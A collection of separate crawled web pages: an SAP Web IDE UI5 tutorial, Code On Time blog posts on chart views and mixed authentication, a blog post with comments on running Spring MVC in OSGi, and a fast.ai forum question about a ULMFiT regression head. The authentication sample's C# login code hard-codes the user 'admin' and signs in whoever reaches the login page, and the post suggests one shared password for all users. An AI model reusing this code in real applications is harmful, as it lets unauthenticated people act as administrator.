headerCountry=Country headerURL=URL headerBusinessPartnerRole=Relationship itf1Title=Contacts itf2Title=Map mapFragmentTitle=Map The actual location in the file doesn’t matter, but it is nice to keep things organized so you can find them easily in the future. You will notice three additional labels that you’ve added. You will use them later in the tutorial. With both files saved, click the Run button again to launch your app. You should now see the four additional fields at the top of the detail view. Before you make some additional changes to the Detail.view.xml file, you will create a XML Fragment file that you will link to the detail view. A Fragment is a light-weight UI components that do not have a dedicated controller. Fragments are typically used in pop up screens (Dialog, Message boxes etc), and you will use one to control the data shown on the second tab of your app. Add a new file to your project by right-clicking on your view folder and select New > File. Name the file Map.fragment.xml (the case is important) and click OK. Paste the XML below into the new Map.fragment.xml file and save your edits. <core:FragmentDefinition xmlns: <l:Grid <l:content> <f:SimpleForm <f:content> <Label text="Address "/> <Text text="{Address/Building}"/> <Text text="{Address/Street}"/> <Text text="{Address/City}"/> <Text text="{Address/PostalCode}"/> <Text text="{Address/CountryText}"/> </f:content> </f:SimpleForm> </l:content> </l:Grid> </core:FragmentDefinition> Your file should look like this: Return to Detail.view.xml. You will make a few simple edits to the file, before you do some bigger restructuring. At the top of the file, in the mvc:View element, insert an additional XML namespace attribute (this namespace will be used when the Fragment is loaded): xmlns:core="sap.ui.core" The top of your file should look like this: Scroll down to the IconTabFilter elements. Update both IconTabFilter sections as shown the image below. You will need to: - change both icon attributes as shown in the image - and insert the two text attributes provided below. These link the label for the tabs to lines you previously inserted into i18n.properties. For the first IconTabFilter element: text="{i18n>itf1Title}" For the second IconTabFilter element: text="{i18n>itf2Title}" The next step is to set the content to be displayed in the first tab. Place your cursor at the end of line 35 (the tooltip line of the first IconTabFilter) and type in <content> (don’t copy and paste this one time). You will notice that as soon as you type the closing angle bracket, the SAP Web IDE automatically inserts the </content> closing tag for you. Add some line feeds between the <content> tags so your file looks like this: This step will start the restructuring of the detail view where you will move the entire <Table> element from its current location and place it within the <content> element you just inserted. Locate the entire <Table> element as shown below, cut the text (using CTRL+X). Paste the text you just cut within the <content> element you added above and save your changes. The field displayed below the contact’s full name is the ContactKey which is not useful to a user. Change that field to show the gender of the contact by replacing {ContactKey} with {GenderText}, save your change and run your app. The detail view will now look like this: The last part of the restructuring is to add in a <content> element for the second tab (the second <IconTabFilter> in the file) to load the Fragment file you created. Insert the XML snippet shown below before the closing tag of the second <IconTabFilter> as shown in the image below. <content> <core:Fragment </content> The section of the Detail.view.xml file for your second <IconTabFilter> should look like this: The last change before running your app is to modify the manifest.json file located in te2016 > webapp. Insert the two lines below as shown in the image. If the file is opened in the Descriptor Editor mode, click the Code Editor tab at the bottom of the window to change the mode. "ach": "ach", "resources": "resources.json", Save your edits and run your app. The two tabs in the detail view should look like the images below. Contact tab: Map tab: Updated 12/12/2017 Contributors Provide Feedback thecodester akula86 adadouche 15 Min.
https://www.sap.com/mena-ar/developer/tutorials/teched-2016-6.html
CC-MAIN-2018-17
refinedweb
1,072
62.27
Code On Time applications now offer a new type of data rendering – “Chart” view. Chart view is just another way of presenting a set of data records retrieved from the database. Chart view supports many end-user features including sorting and adaptive filtering. Generate a new web application from the Northwind database. Browse the generated web site and select Reports | Sales by Category menu option. The following data view will be displayed. Columns CategoryID, Category Name, Product Name, and Product Sales are visible in the grid view. The data controller is based on the database view dbo.[Sales by Category]. This view is a part of the Northwind database and is defined as follows. create view [dbo]. WHERE Orders.OrderDate BETWEEN '19970101' And '19971231' GROUP BY Categories.CategoryID, Categories.CategoryName, Products.ProductName Start the code generator, select the project name, and click Design button. Select the data controller SalesbyCategory and click on Views tab. Add a new view, set its Id to chart1, select Chart as view type, and select command1 as command. Set label to Sales Chart. Enter “Total sales by product category.” in the header text. Save the view and click on its name in the list of available data controller views, select Data Fields tab. Add new data field with the field name set to CategoryName. Set its Chart property under Miscellaneous section to X. Save the field. Add another data field with the field name set to ProductSales. Enter letter “c” without double quotes into Data Format String. Set the Aggregate Function property of the data field to Sum. Set its Chart property to Bar (Cylinder). The list of data views in Designer will look as follows. Exit the Designer and generate your application. Activate the same page and select Sales Chart option in the view selector in the right hand corner of the action bar. The following chart will be displayed. Activate the filter in the view selector and select “Filter…” item in the popup menu of the Category Name option. Select several filter options to review subset of data presented in the chart. The chart view is capable of displaying multiple data series. Let’s add a calculated field to the same data controller to simulate the “Previous Product Sales”. Select the data controller in Designer and activate Fields tab. Add a new field with name PreviousProductSales, indicate that the field value is calculated by SQL formula and enter the following SQL formula cast(ProductSales * Rand() as Numeric(10,2)) into SQL Formula text box. Set the label of the field to “Previous Product Sales”. Set its Data Format String to “c” without quotes. Save the field and select Views tab. Select chart1 in the list of available views. Bind the new field to the chart1 view and set its properties to make them look as shown in the screenshot. Notice that we are using a different Chart type Column(Cylinder) for ProductSales. Run the generated application. The following chart view will be presented if you activate Sales Chart in the view selector. The actual spline that you will see may look different due to randomization factor of the formula that we have specified to simulate the previous sales. You can activate a legend if you select the chart view in Designer and mark the check box “Enable legend in the chart area”. The data field header will be used as the text displayed in the chart legend. Chart views are based on the standard Microsoft Data Visualization component included with ASP.NET 4.0. Unlimited customization options are available to developers. You can quickly customize a chart view if you select “Custom” as Chart property of the data field. All charts are generated as ASP.NET user controls stored in ~/Controls folder of your web application. For example, the name of the chart in this sample is ~/Controls/Chart_SalesbyCategory_chart1.ascx. The name of a chart user control always starts with Chart and includes the name of the data controller and the chart view ID. “Custom” charts are generated once only. If a “Custom” chart exists then the code generator will not make an attempt to generate the chart again. You can safely modified hundreds of the chart control properties. The upcoming updates of the code generation library will include support for Filter Groups on the view level to allow transitioning of grid view data filters applied to a selected chart view and vice versa. Additional chart types will also be supported. We are also working on bring interactive features of the chart such as tool tips and hyperlinks into the code generation library. Code On Time web application generator supports ASP.NET Membership and several other authentication mechanisms. ASP.NET Membership is an attractive option for Internet applications and can be also successfully used in intranet applications deployed within network boundaries of an organization for use by a specific group of business users. Web application administrator can use the advanced user manager provided with each generated application to create user accounts and manage roles. Large organizations frequently mandate the need for a single sign-on mechanism to eliminate the need to manage multiple passwords and users accounts. You can take advantage of either option to implement a mixed authentication based on ASP.NET Membership option available in Code On Time database web application. Only the users registered in the ASP.NET Membership database of your application can access the application. User roles will also be derived from the membership database. Users can self-registered to use the application and will be able to access the application page when the user account is approved by administrator. Administrator can also create all authorized user accounts and assign the same “secret” password to all user. Single sign-on is enabled through changes to the login user control. Open file ~/App_Code/Controls/Login.ascx and modify the code-behind file as shown below. C#: using System; using System.Collections.Generic; using System.Linq; using System.Web; using System.Web.UI; using System.Web.UI.WebControls; using System.Web.Security; using System.Security.Principal; public partial class Controls_Login : System.Web.UI.UserControl { protected void Page_Load(object sender, EventArgs e) { // Mixed authentication sample if (!Page.User.Identity.IsAuthenticated) { string userName = null; // 1. read the identity from the page request header variable userName = Request.Headers["UserName"]; // 2. read the identity from the identity of the current Windows user userName = WindowsIdentity.GetCurrent().Name; // simulate the user name and ignore methods (1) and (2) userName = "admin"; if (!String.IsNullOrEmpty(userName)) { MembershipUser user = Membership.GetUser(userName); if (user != null) FormsAuthentication.RedirectFromLoginPage(user.UserName, false); } } } } Methods of “silent” authentication are marked as (1) and (2). This particular example ignores the obtained information and simply assigns explicitly the user name “admin” to variable “userName”. Application makes a lookup request to identify the user as a valid ASP.NET Membership user. If that is the case then the user is automatically signed into the web application. The login control is generated the first time only. Your changes to the code-behind file will stay intact with subsequent code generations. Adjust the sample to reflect your actual single sign-on method. Code On Time announces support for new type of view called “Chart”. The feature is based on the excellent charting capabilities built into chart component available in Microsoft Data Visualization tools. Chart views are similar to grid views. An additional configuration step requires selection of a chart type. A developer will also have to indicate which data fields will be rendered as X and Y values. Web application generator automatically configures appropriate presentation for the selected chart type. A dedicated chart control is created for each chart view defined in an application. This will allow precise customization of the chart presentation. The new feature allows advanced data visualization with adaptive filtering and sorting. Adaptive filters are available from the first option on the action bar. The next screen shot shows the view with multiple value filters applied to the data. An alternative access to the chart filters is available though the view selector as presented in the next screen shot. Chart views automatically fit into the real estate available in the data view container. Learn more about data view containers at /Documents/UGP2%20-%20User%20Controls.pdf. The chart view support will be shipped in the release scheduled to go out this week. The initial release will support charting in ASP.NET 4.0 projects only with a limited set of chart types. We expect to support dozens of chart types that will require no programming. Developers will be able to customize charts manually to take the full advantage of data visualization components. The feature will be included in Premium and Unlimited subscriptions. The new feature does not require any external components.
https://codeontime.com/blog?min-date=2011-01-01T00:00:00&max-date=2011-01-31T23:59:59
CC-MAIN-2020-16
refinedweb
1,466
51.14
LOST CHILDREN PROBLEM LINK Author: Aman Nadaf Tester: Aman Nadaf Editorialist: Aman Nadaf DIFFICULTY: Cakewalk PREREQUISITES: Linear Search PROBLEM: During a Fair Parents lost their child in the Crowd you are appointed as a Security Guard with a duty to find the particular child. You gather a group of N lost children in a Queue and try to find the child with id K given by his/her Parents. If the child is Found Inform the Parents about the Position of the child in queue else Inform Not Found. Help T such Parents to find their children. EXPLANATION: So we had to take an array of size N (given) and find the position of the id K (given) and check if it is there or not in the array u can take a loop from 0 to n-1 and check if k==array[i] if found then print the position if not then print “ not found”. SOLUTIONS: Setter's Solution #include <bits/stdc++.h> using namespace std; #define ll long long #define ff first #define ss second #define pb push_back #define vi vector<int> #define vll vector<long long int> int main() { int t; cin >> t; while (t--) { ll n, k, pos = 0; cin >> n >> k; ll a[n]; for (ll i = 0; i < n; i++) cin >> a[i]; for (ll i = 0; i < n; i++) { if (a[i] == k) { pos = i + 1; break; } } if (pos == 0) cout << "not found" << endl; else cout << pos << endl; } } Feel free to share your approach here. Suggestions are always welcomed. .
https://discuss.codechef.com/t/lc001-editorial/95861
CC-MAIN-2021-49
refinedweb
257
65.8
- Author: - nmb10 - Posted: - October 31, 2010 - Language: - Python - Version: - 1.2 - django json piston compare - Score: - -1 (after 1 ratings) Shows difference between two json like python objects. May help to test json response, piston API powered sites... Shows properties, values from first object that are not in the second. Example: import simplejson # or other json serializer first = simplejson.loads('{"first_name": "Poligraph", "last_name": "Sharikov",}') second = simplejson.loads('{"first_name": "Poligraphovich", "pet_name": "Sharik"}') df = Diff(first, second) df.difference is ["path: last_name"] Diff(first, second, vice_versa=True) gives you difference from both objects in the one result. df.difference is ["path: last_name", "path: pet_name"] Diff(first, second, with_values=True) gives you difference of the values strings. More like this - format output as table by bendavis78 6 years, 1 month ago - Debug middleware for displaying sql queries and template loading info when ?debug=true by SEJeff 4 years, 4 months ago - Validator for data by limodou 8 years, 6 months ago - update_or_create by abhin4v 6 years, 10 months ago - really_equals by zeeg 8 years, 3 months ago For dicts, you might try to use set(dict1.iteritems()) - set(dict2.iteritems())which will compute the difference for you. fast and efficient. For lists, you might use set(enumerate(list1)) - set(enumerate(list2)). Now generalize the mapper and use set(mapper(json1)) - set(mapper(json2)). No need for 66 lines, which are completely unrelated to Django. # I think it's good, but not for all cases. `fir = {"f": "foo"} sec = {"f": "bar"}` Your method gives us '[('f', 'foo')]' difference, but the both has the same keys. `fir = {"f": "foo"} sec = {"f": [1]}` Your method does not give you proper difference. `fir = {"f": {"f": "fir"}} sec = {"f": {"b": "bar"}}` # Please login first before commenting.
https://djangosnippets.org/snippets/2247/
CC-MAIN-2015-35
refinedweb
288
58.18
Writing C in the 21st century The Internet Systems Consortium, or ISC for short, is well known for developing and publishing Internet system software such as BIND and DHCP. Today, they commented on why they re-wrote BIND 10 in C++ and Python. I think this needs some discussion. They write So when ISC started seriously thinking about BIND 10 – around 2006 or so – the question of what language to use for the new project came up. The first question is of course, “Why not C?” Some answers are: String manipulation in C is a tedious chore String manipulation in C can be a tedious chore when you write something like this (taken from lib/isccc/cc.c) len = strlen(_frm) + strlen(_to) + strlen(_ser) + strlen(_tim) + 4; key = malloc(len); if (key == NULL) return (ISC_R_NOMEMORY); snprintf(key, len, "%s;%s;%s;%s", _frm, _to, _ser, _tim); all the time and don’t follow the DRY rule. Not only is key = g_strdup_printf ("%s;%s;%s;%s", _frm, _to, _ser, _tim); shorter and easier to grasp, it is also a lot less dangerous than calculating the final string length by hand. Even if ISC decides not to use a portable C library such as GLib or Apache APR, they could still write something like that on their own instead of relying on C’s standard library. Error handling is optional and cumbersome Yes, error handling is optional and sometimes it is cumbersome but exception handling as used in C++ or Java is no silver bullet either. Whereas C1 and Go explicitly tell the developer “look, this might be a potentially dangerous call”, a C++ program might explode in places where you don’t expect that to happen. Encapsulation and other object-oriented features must be emulated Encapsulation must not be “emulated”, it is part of the language design. Thousands of robust and cleanly written libraries have shown how this works for decades now: provide an opaque data structure and let the user access it via public API functions. I wonder what the other ominous, object-oriented features are. C lacks good memory management What constitutes “good” memory management? Fast, predictable and extensible? Or safe and simple with a garbage collector? Both is possible with C. On the other hand, C++ is a lot better at resource management if RAII is used. But then, it must be implemented consequently. I am not saying, that C++ is a bad choice nor that C does wonders for BIND. But, naive and untrue statements about C and strange reasons in favor of C++ like this C++ is also a very popular language, and also has all of the features we are looking for. However, C++ is by no means an easy language to work with, so the idea is that we will avoid its complexity when possible. deserves some clarification. C is [not dead][] and even today, new projects can be written in it in a sound and safe way. But the people must be willing to dedicate a little bit of their precious time. A lively discussion about ISC’s blog post is going on in [this][] HN comment thread. Yes, I know you can ignore return values. But at least you know, that a function that returns an error code can fail. A C++ exception is handed up the stack to whoever catches it first. [not dead]: [this]:
https://bloerg.net/posts/writing-c-in-the-21st-century/
CC-MAIN-2021-25
refinedweb
565
62.17
Microsoft and Hadoop - Windows Azure HDInsight Introduction Traditionally Microsoft Windows used to be a sort of stepchild in Hadoop world – the ‘hadoop’ command to manage actions from command line and the startup/shutdown scripts were written in Linux/*nix in mind assuming bash. Thus if you wanted to run Hadoop on Windows, you had to install cygwin. Also Apache Hadoop document states the following (quotes from Hadoop R1.1.0 documentation): “•GNU/Linux is supported as a development and production platform. Hadoop has been demonstrated on GNU/Linux clusters with 2000 nodes •Win32 is supported as a development platform. Distributed operation has not been well tested on Win32, so it is not supported as a production platform.” Microsoft and Hortonworks joined their forces to make Hadoop available on Windows Server for on-premise deployments as well as on Windows Azure to support big data in the cloud, too. This post covers Windows Azure HDInsight (Hadoop on Azure, see) . As of writing, the service requires an invitation to participate in the CTP (Community Technology Preview) but the invitation process is very efficiently managed - after filling in the survey, I received the service access code within a couple of days. New Cluster Request The first step is to request a new cluster, you need to define the cluster name and the credentials to be able to login to the headnode. By default the cluster consists of 3 nodes. After a few minutes, you will have a running cluster, then click on the “Go to Cluster” link to navigate to the main page. WordCount with HDInsight on Azure No Hadoop test is complete without the standard WordCount application – Microsoft Azure HDInsight provides an example file (davinci.txt) and the Java jar file to run wordcount - the Hello World of Hadoop. First you need to go to the JavaScript console to upload the text file using fs.put(): js> fs.put() Choose File -> Browse Destination: /user/istvan/example/data/davinci Create a Job: The actual command that Microsoft Azure HDInsight executes is as follows: c:\apps\dist\hadoop-1.1.0-SNAPSHOT\bin\hadoop.cmd jar c:\apps\Jobs\templates\634898986181212311.hadoop-examples-1.1.0-SNAPSHOT.jar wordcount /user/istvan/example/data/davinci davinci-output You can validate the output from JavaScript console: js> result = fs.read("davinci-output") "(Lo)cra" 1 "1490 1 "1498," 1 "35" 1 "40," 1 "AS-IS". 1 "A_ 1 "Absoluti 1 "Alack! 1 Microsoft HDInsight Streaming – Hadoop job in C# Hadoop Streaming is a utility to support running external map and reduce jobs. These external jobs can be written in various programming languages such as Python or Ruby – should we talk about Microsoft HDInsight, the example better be based on .NET C#… The demo application for C# streaming is again a wordcount example using the imitation of Unix cat and wc commands. You could run the demo from the “Samples” tile but I prefer to demonstrate Hadoop Streaming from the command line to have a closer look at what is going on under the hood. In order to run Hadoop command line from Windows cmd prompt, you need to login to the HDInsight headnode using Remote Desktop. First you need to click on “Remote Desktop” tile, then login the remote node using the credentials you defined at cluster creation time. Once you logged in, click on Hadoop Coomand Line shortcut. In Hadoop Command Line, go to the Hadoop distribution directory (As of writing this post, Microsoft Azure HDInsight is based on Hadoop 1.1.0): c:> cd \apps\dist c:> hadoop fs -get /example/apps/wc.exe . c:> hadoop fs -get /example/apps/cat.exe . c:> cd \apps\dist\hadoop-1.1.0-SNAPSHOT c:\apps\dist\hadoop-1.1.0-SNAPSHOT> hadoop jar lib\hadoop-streaming.jar -input "/user/istvan/example/data/davinci" -output "/user/istvan/example/dataoutput" -mapper "..\..\jars\cat.exe" -reducer "..\..\jars\wc.exe" -file "c:\Apps\dist\wc.exe" -file "c:\Apps\dist\cat.exe" The C# code for wc.exe is as follows: using System; using System.IO; using System.Linq; namespace wc { class wc { static void Main(string[] args) { string line; var count = 0; if (args.Length > 0){ Console.SetIn(new StreamReader(args[0])); } while ((line = Console.ReadLine()) != null) { count += line.Count(cr => (cr == ' ' || cr == '\n')); } Console.WriteLine(count); } } } And the code for cat.exe is: using System; using System.IO; namespace cat { class cat { static void Main(string[] args) { if (args.Length > 0) { Console.SetIn(new StreamReader(args[0])); } string line; while ((line = Console.ReadLine()) != null) { Console.WriteLine(line); } } } } Interactive console Microsoft Azure HDInsight comes with two types of interactive console: one is the standard Hadoop Hive console, the other one is unique in Hadoop world, it is based on JavaScript. Let us start with Hive. You need to upload your data using the javascript fs.put() method as described above. Then you can create your Hive table and run a select query as follows : CREATE TABLE stockprice (yyyymmdd STRING, open_price FLOAT, high_price FLOAT, low_price FLOAT, close_price FLOAT, stock_volume INT, adjclose_price FLOAT) row format delimited fields terminated by ',' lines terminated by '\n' location '/user/istvan/input/'; select yyyymmdd, high_price, stock_volume from stockprice order by high_price desc; The other flavor of HDInsight interactive console is based on JavaScript - as said before, this is a unique offering from Microsoft – in fact, the JavaScript commands are converted to Pig statements. The syntax resembles a kind of LINQ style query, though not the same: js> pig.from("/user/istvan/input/goog_stock.csv", "date,open,high,low,close,volume,adjclose", ",").select("date, high, volume").orderBy("high DESC").to("result") js> result = fs.read("result") 05/10/2012 774.38 2735900 04/10/2012 769.89 2454200 02/10/2012 765.99 2790200 01/10/2012 765 3168000 25/09/2012 764.89 6058500 Under the hood Microsoft and Hortonworks have re-implemented the key binaries (namenode, jobtracker, secondarynamenode, datanode, tasktracker) as executables (exe files) and they are running as services in the background. The key ‘hadoop’ command – which is traditionally a bash script – is also re-implemented as hadoop.cmd. The distribution consists of Hadoop 1.1.0, Pig-0.9.3, Hive 0.9.0, Mahout 0.5 and Sqoop 1.4.2.
https://dzone.com/articles/microsoft-and-hadoop-windows
CC-MAIN-2015-40
refinedweb
1,039
58.18
Running Spring MVC Web Applications in OSGi For the past couple of weeks, I've been developing a web application that deploys into an OSGi container (Equinox) and uses Spring DM's Spring MVC support. The first thing I discovered was that Spring MVC's annotations weren't supported in the M1 release. This was apparently caused by a bug in Spring 2.5.3 and not Spring DM. Since Spring DM 1.1.0 M2 was released with Spring 2.5.4 today, I believe this is fixed now. The story below is about my experience getting a Spring MVC application up and running in Equinox 3.2.2, Jetty 6.1.9 and Spring DM 1.1.0 M2 SNAPSHOT (from last week). If you want to read more about why Spring MVC + OSGi is cool, see Costin Leau's Web Applications and OSGi article. To get a simple "Hello World" Spring MVC application working in OSGi is pretty easy. The hard part is setting up a container with all the Spring and Jetty bundles installed and started. I imagine SSAP might solve this. Luckily for me, this was done by another member of my team. After you've done this, it's simply a matter of creating a MANIFEST.MF for your WAR that contains the proper information for OSGi to recognize. Below is the one that I used when I first tried to get my application working. Manifest-Version: 1 Bundle-ManifestVersion: 2 Spring-DM-Version: 1.1.0-m2-SNAPSHOT Spring-Version: 2.5.2 Bundle-Name: Simple OSGi War Bundle-SymbolicName: myapp Bundle-Classpath: .,WEB-INF/classes,WEB-INF/lib/freemarker-2.3.12.jar, WEB-INF/lib/sitemesh-2.3.jar,WEB-INF/lib/urlrewritefilter-3.0.4.jar, WEB-INF/lib/spring-beans-2.5.2.jar,WEB-INF/lib/spring-context-2.5.2.jar, WEB-INF/lib/spring-context-support-2.5.2.jar,WEB-INF/lib/spring-core-2.5.2.jar, WEB-INF/lib/spring-web-2.5.2.jar,WEB-INF/lib/spring-webmvc-2.5.2 Ideally, you could generate this MANIFEST.MF using the maven-bundle-plugin. However, it doesn't support WARs in its 1.4.0 release. You can see this is an application that uses Spring MVC, FreeMarker, SiteMesh and the URLRewriteFilter. You should be able to download it, unzip it, run "mvn package" and install it into Equinox using "install file://<path to war>". That's all fine and dandy, but doesn't give you any benefits of OSGi. This setup works great until you try to import OSGi services using a context file with an <osgi:reference> element. After adding such a reference, it's likely you'll get the following error: SEVERE: Context initialization failed org.springframework.beans.factory.parsing.BeanDefinitionParsingException: Configuration problem: Unable to locate Spring NamespaceHandler for XML schema namespace [] To fix this, add the following to your web.xml (if you're using ContextLoaderListener, as an <init-parameter> on DispatcherServlet if you're not): <context-param> <param-name>contextClass</param-name> <param-value>org.springframework.osgi.web.context.support.OsgiBundleXmlWebApplicationContext</param-value> </context-param> After doing this, you might get the following error on startup: SEVERE: Context initialization failed org.springframework.context.ApplicationContextException: Custom context class [org.springframework.osgi.web.context.support.OsgiBundleXmlWebApplicationContext] is not of type [org.springframework.web.context.ConfigurableWebApplicationContext] To fix this, I change from referencing the Spring JARs in WEB-INF/lib to importing the packages for Spring (which were already installed in my Equinox container). Bundle-Classpath: .,WEB-INF/classes,WEB-INF/lib/freemarker-2.3.12.jar, After rebuilding my WAR and reloading the bundle in Equinox, I was confronted with the following error message: SEVERE: Context initialization failed org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'freemarkerConfig' defined in ServletContext resource [/WEB-INF/myapp-servlet.xml]: Instantiation of bean failed; nested exception is java.lang.NoClassDefFoundError: freemarker/cache/TemplateLoader at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.instantiateBean(AbstractAutowireCapableBeanFactory.java:851) As far as I can tell, this is because the version of Spring MVC installed in Equinox cannot resolve the FreeMarker JAR in my WEB-INF/lib directory. To prove I wasn't going insane, I commented out my "freemarkerConfig" and "viewResolver" beans in myapp-servlet.xml and changed to a regular ol' InternalResourceViewResolver: <bean id="viewResolver" class="org.springframework.web.servlet.view.InternalResourceViewResolver"> <property name="prefix" value="/"/> <property name="suffix" value=".jsp"/> </bean> This worked and I was able to successfully see "Hello World" from a JSP in my browser. FreeMarker/SiteMesh worked too, but FreeMarker didn't work as a View for Spring MVC. To attempt to solve this, I create a bundle for FreeMarker using "java -jar bnd-0.0.249.jar wrap freemarker-2.3.12.jar" and installed it in Equinox. I then change my MANIFEST.MF to use FreeMarker imports instead of referencing the JAR in WEB-INF/lib. Bundle-Classpath: .,WEB-INF/classes Unfortunately, this still doesn't work and I still haven't been able to get FreeMarker to work with Spring MVC in OSGi. The crazy thing is I actually solved this at one point a week ago. Shortly after, I rebuilt Equinox from scratch and I'm been banging my head against the wall over this issue ever since. Last week, I entered an issue in Spring's JIRA, but thought I'd fixed it a few hours later. I've uploaded the final project that's not working to the following URL: If you'd like to see this project work with Spring MVC + JSP, simply modify myapp-servlet.xml to remove the FreeMarker references and use the InternalResourceViewResolver instead. I hope Spring DM + Spring MVC supports more than just JSP as a view technology. I hope I can't get FreeMarker working because of some oversight on my part. If you have a Spring DM + Spring MVC application working with Velocity or FreeMarker, I'd love to hear about it. Great to see you working on OSGi stuff. With regard to your Freemarker problem, sadly bringing a third party library into OSGi is rarely as simple as just running "bnd wrap" over it. The issue is the dependencies... bnd does bytecode analysis to discover all of the static dependencies inside Freemarker and it adds those to the manifest. So if it discovers a dependency on (say) org.apache.commons.lang, then the FM bundle won't resolve unless you have commons-lang bundleized and installed as well. The real the problem is that many libraries include dependencies on crazy stuff. For example lots have a dependency on JUnit because they have not properly separated their tests from their runtime parts. However bnd has no way to automatically discriminate between "true" runtime dependencies and the ones that are just sitting around in the JAR. So you have to help it along. The initial step is to run bnd and then look at the imports it has included, then you determine which of those imports are not really needed, and you write a properties file to tell bnd that those imports should be made optional. I am in the process of documenting these issues in my book, but I haven't yet released the chapter on working with 3rd party libraries. But you may still find something useful in the chapters that I have released: Regards, Neil PS I tried to download Freemarker myself and check if this was in fact the problem, but unfortunately SourceForge seems to be down at present. Posted by Neil Bartlett on April 30, 2008 at 05:49 AM MDT # Posted by Carlos Sanchez on April 30, 2008 at 10:03 AM MDT # This was a great challenge application for the SpringSource Application Platform - especially in the light of the comments from Neil Bartlett and Carlos Sanchez above. I'm pleased to say that getting this application to work on the SpringSource Application Platform was trivial, and a testament to the points I made in my blog last night Completing the picture, Spring, OSGi, and the SpringSource Application Platform.Here are the steps I followed: I think this is a nice demonstration of the value proposition of the platform in smoothing the path of making enterprise libraries work under OSGi. I'm happy to send you the updated code if you would like it, but it should be very easy to recreate these simplifications to your application :)Regards, Adrian. Posted by Adrian Colyer on May 02, 2008 at 08:22 AM MDT # Posted by Matt Raible on May 02, 2008 at 11:04 AM MDT # If you want to use <osgi:reference> then you will need that context class, yes. We distinguish between "shared library" war files that simply use Import Package / Bundle / Library in their manifest, and "shared service" war files that also can inject references to OSGi services. These two stages form a migration path towards a true par file. Your initial application didn't use any "shared services" so the special context wasn't needed. Good luck with the application - do keep us posted on any issues you run into so that we can continue to make things work better for you. Thanks, Adrian. Posted by Adrian Colyer on May 03, 2008 at 12:33 AM MDT # Please bear in mind that using the Import-Library and Import-Bundle headers as recommended by Adrian will tie you to S2AP, as these are non-standard extensions introduced by SpringSource. My recommendation is to stick with the full Import-Package list. Yes it is long, but at least the dependencies of your bundle are defined <strong>in your bundle</strong> rather than in some external artifact which might change. I have detailed some of my issues with SpringSource's extensions in my blog post here: Cheers Neil Posted by Neil Bartlett on May 08, 2008 at 04:09 AM MDT # Posted by Rob Harrop on May 08, 2008 at 11:49 AM MDT # Posted by Matt Raible on May 14, 2008 at 10:38 AM MDT # The tool that Adrian and Rob mentioned does not yet exist; however, I'll share a perhaps little know tip with you... If you create a bundle using Import-Bundle or Import-Library, you can view the Platform's trace (i.e., PLATFORM_HOME/serviceability/trace/trace.log) and see exactly how those manifest headers get translated into standard OSGi Import-Package statements. Just search for "transformed from:", and just after that you'll find a "to:" with the transformed manifest immediately following. Now to answer the question you posted on the S2AP beta forum regarding how to get your sample web application to run on the Platform without any SpringSource specific manifest headers: As Adrian already mentioned, it's rather trivial to convert your web-app to run using Import-Bundle and Import-Library. So, to get it to run on the SpringSource Application Platform using only Import-Package, simply follow Adrian's above steps, but use the following manifest instead: Delete the following, as they are not necessary for deploying WARs or Web Modules on the S2AP: And in web.xml, use PlatformOsgiBundleXmlWebApplicationContext instead of OsgiBundleXmlWebApplicationContext as the 'contextClass' context-param for Spring MVC's ContextLoaderListener. For example: I hope this gets you up and running with your Freemarker web-app on the S2AP! Best regards, Sam SpringSource Posted by Sam Brannen on May 16, 2008 at 10:03 PM MDT # Hi, I am trying to test and install: but when I do: I get: and when I go to I get: Any ideas? Thank you Yours Misha Posted by Misha Koshelev on October 10, 2010 at 09:36 PM MDT # Posted by JIRA: OpenMRS Trunk on October 11, 2010 at 04:30 PM MDT # Update: I have installed successfully on Virgo Web Server: I enable the Equinox telnet console by uncommenting the following line: then drop the following bundle into pickup: I go to the console, install bundle, it is active: Yet get a 404 from the suggested URL: Any ideas? Thank you! Misha Posted by Misha Koshelev on October 12, 2010 at 07:18 PM MDT # Posted by Matt Raible on October 12, 2010 at 10:07 PM MDT # I download your zip and packaged and installed the war. But I am getting this error. Where I am wrong, Thanks. Posted by Muthu on August 31, 2013 at 12:33 PM MDT #
http://raibledesigns.com/rd/entry/running_spring_mvc_web_applications
CC-MAIN-2016-18
refinedweb
2,080
53.1
I’ve an assignment in college to train a language model and use it for regression. So I’ve had problems in transferring the trained model for regression. After a day of going through the text/learner.py code I understood that we are supposed to batch the whole input sentence in a single batch and pass it to the new tail network we join for regression. I dont want to use PoolingLinearClassifier for now since I dont understand it much. In Lesson 12 Jeremy talks about this and I found the SentenceEncoder code which is very similar to the MultiBatchEncoder in source repository. This version kind of worked a bit in my code because of the different way in which it is concatenating at the end of the forward method. I also dont understand how to concat method of SentenceEncoder is working or how the pad_tensor method is working. Another thing is since we concat all texts together along with appending xxbos and xxeos, wouldn’t the size of input be always bppt, I dont understand how it would return sl which I’m assuming is sentence length. Is batching for classification done differently? def pad_tensor(t, bs, val=0.): if t.size(0) < bs: return torch.cat([t, val + t.new_zeros(bs-t.size(0), *t.shape[1:])]) return t class SentenceEncoder(nn.Module): def __init__(self, module, bptt, pad_idx=1): super().__init__() self.bptt,self.module,self.pad_idx = bptt,module,pad_idx def concat(self, arrs, bs): return [torch.cat([pad_tensor(l[si],bs) for l in arrs], dim=0) for si in range(len(arrs[0]))] def forward(self, input): bs,sl = input.size() self.module.bs = bs self.module.reset() outputs = [] for i in range(0, sl, self.bptt): o = self.module(input[:,i: min(i+self.bptt, sl)]) outputs.append(o) ops = self.concat(outputs, bs) return torch.stack(ops) Now what I dont understand is there is no mention of a max_len for input and thus how do we fix the next Linear Layer? My code for the regression model is: class RegModel(nn.Module): def __init__(self, learn_lm, y_range=[-0.5,3.5]): super(RegModel, self).__init__() self.encoder = SentenceEncoder(learn_lm.model.encoder, learn_lm.data.bptt) layers = [1200, 50, 1] ps = [0.12, 0.1] # I'll add more layers for this part once this starts to work self.plc = nn.Sequential( nn.Linear(134*64, 1), # the shape of the self.encoder(x) was (64*134) # for first iteration so I used it. Still gives Error ) def forward(self, x): x = self.encoder(x) x = self.plc(x) # range of output is [0,3] x = F.sigmoid(x) x = x*(self.y_range[1] - self.y_range[0]) This is my encoder: LabEncoder( (rnn): my_gru( (rnn): GRU(50, 50, batch_first=True) ) (encoder): Sequential( (0): Embedding(7400, 50) (1): my_gru( (rnn): GRU(50, 50, batch_first=True) ) ) ) Thanks a lot
https://forums.fast.ai/t/sentenceencoder-lesson-12-ulmfit/69772
CC-MAIN-2022-21
refinedweb
484
60.82
